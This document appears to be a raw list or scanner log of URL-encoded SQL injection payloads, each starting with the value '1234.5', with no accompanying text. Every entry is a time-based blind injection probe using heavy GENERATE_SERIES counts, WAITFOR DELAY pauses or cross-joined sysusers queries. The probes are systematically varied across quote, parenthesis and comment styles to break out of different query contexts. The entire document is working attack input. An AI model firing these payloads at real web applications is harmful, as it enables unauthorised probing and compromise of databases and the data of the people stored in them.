1234.5%22%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22hgDp%22%20LIKE%20%22hgDp 1234.5%25%27%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27PPHq%27%3D%27PPHq 1234.5%00%27%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27teYY%27%3D%27teYY 1234.5%27%29%20WHERE%202598%3D2598%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 1234.5%22%29%20WHERE%208980%3D8980%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 1234.5%29%20WHERE%208055%3D8055%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 1234.5%27%20WHERE%205233%3D5233%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 1234.5%22%20WHERE%203094%3D3094%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 1234.5%20WHERE%202028%3D2028%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27rgWy%27%20FROM%20DUAL%20WHERE%207125%3D7125%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27Iqnc%27%20WHERE%204309%3D4309%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20zDnK%20WHERE%205255%3D5255%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27Oujb%27%20WHERE%203636%3D3636%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%207684%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20%23 1234.5%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%22%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%29%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%29%29%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%29%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%29%29%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%29%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%29%29%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%22%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%22%29%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%22%29%29%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%22%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%22%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%22%29%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%22%29%29%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%22%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%25%27%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%25%27%29%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%25%27%29%29%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%25%27%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%00%27%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%00%27%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%29%20WHERE%208629%3D8629%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%22%29%20WHERE%209788%3D9788%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%29%20WHERE%206909%3D6909%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%20WHERE%203597%3D3597%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%22%20WHERE%202182%3D2182%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%20WHERE%206751%3D6751%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%7C%7C%28SELECT%20%27CcBY%27%20FROM%20DUAL%20WHERE%201211%3D1211%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%7C%7C%28SELECT%20%27SESq%27%20WHERE%203052%3D3052%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%2B%28SELECT%20JcJG%20WHERE%205613%3D5613%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%2B%28SELECT%20%27ngam%27%20WHERE%202947%3D2947%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%208836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1234.5%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%25%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%25%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%25%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%25%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%00%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%00%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%20WHERE%202680%3D2680%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%20WHERE%202313%3D2313%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%29%20WHERE%202780%3D2780%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%20WHERE%201993%3D1993%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%20WHERE%208248%3D8248%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%20WHERE%201989%3D1989%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%7C%7C%28SELECT%20%27osOv%27%20FROM%20DUAL%20WHERE%208927%3D8927%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%7C%7C%28SELECT%20%27OPRd%27%20WHERE%208766%3D8766%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%2B%28SELECT%20piMZ%20WHERE%207752%3D7752%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%2B%28SELECT%20%27voQS%27%20WHERE%204759%3D4759%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%27%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%27%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%22%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%286664%3D6664 1234.5%29%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%289835%3D9835 1234.5%29%29%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%283516%3D3516 1234.5%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1234.5%27%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27EqsZ%27%3D%27EqsZ 1234.5%27%29%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27hBju%27%3D%27hBju 1234.5%27%29%29%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27YkAX%27%3D%27YkAX 1234.5%27%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27mLoZ%27%3D%27mLoZ 1234.5%27%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27RRpU%27%20LIKE%20%27RRpU 1234.5%27%29%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27HYBD%27%20LIKE%20%27HYBD 1234.5%27%29%29%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27imbw%27%20LIKE%20%27imbw 1234.5%27%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27Hixr%27%20LIKE%20%27Hixr 1234.5%22%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22uZrv%22%3D%22uZrv 1234.5%22%29%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22HihZ%22%3D%22HihZ 1234.5%22%29%29%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22GVLp%22%3D%22GVLp 1234.5%22%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22WDkq%22%3D%22WDkq 1234.5%22%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22uNoc%22%20LIKE%20%22uNoc 1234.5%22%29%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22lWSY%22%20LIKE%20%22lWSY 1234.5%22%29%29%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22aQsc%22%20LIKE%20%22aQsc 1234.5%22%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22EseT%22%20LIKE%20%22EseT 1234.5%25%27%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27INCX%27%3D%27INCX 1234.5%00%27%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27VWXz%27%3D%27VWXz 1234.5%27%29%20WHERE%209787%3D9787%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 1234.5%22%29%20WHERE%205836%3D5836%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 1234.5%29%20WHERE%206712%3D6712%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 1234.5%27%20WHERE%207872%3D7872%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 1234.5%22%20WHERE%207447%3D7447%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 1234.5%20WHERE%209546%3D9546%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27VLAw%27%20FROM%20DUAL%20WHERE%202784%3D2784%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27YehR%27%20WHERE%201794%3D1794%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20kknC%20WHERE%201021%3D1021%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27CSlf%27%20WHERE%206815%3D6815%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%209443%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%23 1234.5%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%22%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%29%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 